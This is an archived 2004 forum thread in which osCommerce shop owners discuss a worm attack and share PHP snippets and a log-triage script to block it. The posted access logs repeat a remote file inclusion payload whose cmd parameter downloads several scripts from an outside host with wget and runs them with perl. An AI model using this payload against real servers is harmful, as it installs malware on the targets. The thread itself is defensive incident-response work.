Guest Posted December 26, 2004

My host sent me a message about a worm infection? They suspect the osCommerce script causes the problem :( (By the way, I don't have phpBB on the site.)

They sent me this info about it:

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:41 +0100] "GET /conditions.php?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 27696 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:42 +0100] "GET /shopping_cart.php?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 23367 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:42 +0100] "GET /redirect.php?action=manufacturer&manufacturers_id=61&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:43 +0100] "GET /redirect.php?action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:44 +0100] "GET /index.php?manufacturers_id=61&amp;osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 33435 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:45 +0100] "GET /index.php?manufacturers_id=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19601 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:45 +0100] "GET /specials.php?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 28147 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:46 +0100] "GET /product_info.php?products_id=396&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 23558 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:47 +0100] "GET /reviews.php?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 36272 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:47 +0100] "GET /product_reviews_write.php?products_id=290&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:48 +0100] "GET /product_reviews_write.php?products_id=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:49 +0100] "GET /index.php?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 32331 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:49 +0100] "GET /product_info.php?cPath=77&products_id=290&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19058 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:54 +0100] "GET /product_info.php?cPath=77&products_id=290&language=en&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19077 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:51:08 +0100] "GET /product_info.php?products_id=291&cPath=77&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 25476 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:51:22 +0100] "GET /index.php?cPath=69&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 46505 "-" "LWP::Simple/5.800"
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:51:50 +0100] "GET /index.php?cPath=24&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 27395 "-" "LWP::Simple/5.800"

Does anybody know what this means? And what can I do? (I will contact the host too, but not today, since it's Christmas.)

Guest Posted December 26, 2004

Would switching off perl help maybe? (see posted log) I don't need perl for the site, as far as I know :huh:

Guest Posted December 26, 2004

It's just eating bandwidth... nothing to worry about.

Arcadiauk Posted December 26, 2004

We've had this website in our site too: "www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.vi" etc. etc.

CHEMO, you say it's just eating bandwidth and nothing to worry about. Have you heard of this before then?

Derek

Guest Posted December 26, 2004

http://wordpress.org/support/7/19285

Arcadiauk Posted December 26, 2004

CHEMO

Just did a search on Google and found that. Just added the following to the top of my index.php as suggested...

    // Stop any request whose URI mentions the attacker's host.
    // $_SERVER is read directly so the check does not rely on register_globals.
    if (strpos($_SERVER['REQUEST_URI'], 'visualcoders.net') !== false) {
        exit;
    }

Not sure if it will help though.

Derek

Guest Posted December 26, 2004

I would block the user agent, but that is a personal choice... I happen to have my own server so I just added it to my Apache config file to reject that "bad bot" agent.

Guest Posted December 26, 2004

Thanks for your tips!

> I would block the user agent but that is a personal choice... I happen to have my own server so just added it to my Apache config file to reject that "bad bot" agent.

Stupid question probably, but could you tell me how to find out what the user agent is?

I also found this thread on the forums; it seems to be related: http://www.oscommerce.com/forums/index.php?sho...14entry511814

So I will try to block by user agent, and ask the host to upgrade PHP also.

stevel Posted December 26, 2004

The user agent is "LWP::Simple/5.800".

Steve

Guest Posted December 26, 2004

> The user agent is "LWP::Simple/5.800".

Thanks Steve, going to add that one right away! (Almost bedtime here, think I will sleep much better now :) )

Since I think I will need to know the user agent more often in the near future, could you tell me how I can find out myself next time?

Arcadiauk Posted December 26, 2004

Sorry to be thick, but where & what do I need to enter to block that user agent?

Thanks in advance

Derek

Guest Posted December 26, 2004

Hi Derek, it does not seem to help after all. It seems not to be visualcoders itself where the problem comes from (in my case); it's coming from lots and lots of different IP addresses from all over the world (so I guess the user agent will be different too).

I included this into my application_top.php and added a blocked_agents.txt file to the includes directory (just as how the spider sessions are suppressed):

    // banned user agents
    define('BLOCK_BY_USER_AGENT', 'True');
    if (BLOCK_BY_USER_AGENT == 'True') {
      // The agent is lowercased here, so entries in blocked_agents.txt
      // only match if they are written in lowercase as well.
      $user_agent = strtolower(getenv('HTTP_USER_AGENT'));
    //  $block_user_agent = false;
      if (!(is_null($user_agent))) {
        // One substring per line.
        $blocked_agents = file('includes/blocked_agents.txt');
        for ($i = 0, $n = sizeof($blocked_agents); $i < $n; $i++) {
          $needle = trim($blocked_agents[$i]);
          // Skip blank lines: an empty needle makes strpos() warn on
          // PHP < 8 and match every request on PHP 8+.
          if ($needle !== '') {
            if (is_integer(strpos($user_agent, $needle))) {
    //          $block_user_agent = true;
              exit('This user agent seems to be blocked!');
            }
          }
        }
      }
    }

Or maybe the above script itself does function properly? Didn't have to test it properly yet.

Guest Posted December 27, 2004

:blush: I didn't think. I am using the code from the osC spider session script, but I didn't notice the "strtolower", and added the agent name using capitals.

Now I added "lwp" (without the quotes) to the list. Don't know if it works yet; suddenly they all come and the next moment they're all gone again.

Guest Posted December 27, 2004

Blocking only "lwp::simple/5.800" does not seem enough, but it looks like blocking all "lwp" does help.

Would it be wise to block all "lwp" user agents? Or am I blocking important search engines and/or lots of users too?

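An added example, not part of the thread and not osCommerce code: the posts above match on the user agent, while this Python log triage matches on the request itself, flagging any query parameter whose value is a remote URL, the pattern visible in the posted log. The sample lines, host names and IP addresses are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache combined log line, with the optional "file:" prefix that grep adds
# when it searches several logs (the form the host sent in the thread).
LOG_RE = re.compile(
    r'^(?:\S+:)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[[^\]]+\] "[A-Z]+ '
    r'(?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)

def injected_params(target):
    """Names of query parameters whose value is a remote URL."""
    # Clients that copy hrefs out of HTML send "&amp;" literally; undo it.
    query = urlsplit(target.replace('&amp;', '&')).query
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL.match(value)]

def triage(lines):
    """Return (hits, agents): flagged requests and a count of their user agents."""
    hits, agents = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        params = injected_params(m['target'])
        if params:
            hits.append((m['ip'], m['status'], params))
            agents[m['agent']] += 1
    return hits, agents

# Constructed sample: documentation IPs and placeholder hosts, not the thread's log.
SAMPLE = [
    'shop.example/logs/access_log:203.0.113.9 - - [25/Dec/2004:02:50:41 +0100] '
    '"GET /index.php?osCsid=http://files.example/x.gif?&cmd=cd%20/tmp HTTP/1.1" '
    '200 27696 "-" "LWP::Simple/5.800"',
    '198.51.100.4 - - [25/Dec/2004:02:50:44 +0100] '
    '"GET /index.php?manufacturers_id=61&amp;osCsid=http://files.example/x.gif? HTTP/1.1" '
    '200 33435 "-" "Mozilla/4.0 (compatible)"',
    '198.51.100.7 - - [25/Dec/2004:02:51:02 +0100] '
    '"GET /product_info.php?products_id=290&osCsid=a1b2c3d4e5 HTTP/1.1" '
    '200 19058 "-" "lwp-trivial/1.41"',
]

if __name__ == '__main__':
    hits, agents = triage(SAMPLE)
    for ip, status, params in hits:
        print(ip, status, params)
    print(agents.most_common())
```

The second sample line is flagged although its agent is not LWP, and the third is an LWP client making an ordinary request that is left alone, which is the trade-off a blanket "lwp" block does not show.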
This topic is now archived and is closed to further replies.